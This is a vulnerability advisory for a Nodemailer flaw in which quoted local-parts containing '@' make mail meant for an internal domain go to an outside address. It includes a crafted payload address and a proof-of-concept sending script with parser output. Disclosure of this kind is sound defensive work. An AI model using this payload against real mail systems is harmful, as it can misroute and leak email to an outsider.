CVE-2025-13033: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict

The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.

Payload: "xclow3n@gmail.com x"@internal.domain Using the following code to send mail

const nodemailer = require("nodemailer");

let transporter = nodemailer.createTransport({
service: "gmail",
auth: {
user: "",
pass: "",
},
});

let mailOptions = {
from: '"Test Sender" <your_email@gmail.com>',
to: "\"xclow3n@gmail.com x\"@internal.domain",
subject: "Hello from Nodemailer",
text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};

transporter.sendMail(mailOptions, (error, info) => {
if (error) {
return console.log("Error: ", error);
}
console.log("Message sent: %s", info.messageId);

});


(async () => {
const parser = await import("@sparser/email-address-parser");
const { EmailAddress, ParsingOptions } = parser.default;
const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);

if (!parsed) {
console.error("Invalid email address:", mailOptions.to);
return;
}

console.log("Parsed email:", {
address: `${parsed.localPart}@${parsed.domain}`,
local: parsed.localPart,
domain: parsed.domain,
});
})();

Running the script and seeing how this mail is parsed according to RFC

Parsed email: {
address: '"xclow3n@gmail.com x"@internal.domain',
local: '"xclow3n@gmail.com x"',
domain: 'internal.domain'
}

But the email is sent to xclow3n@gmail.com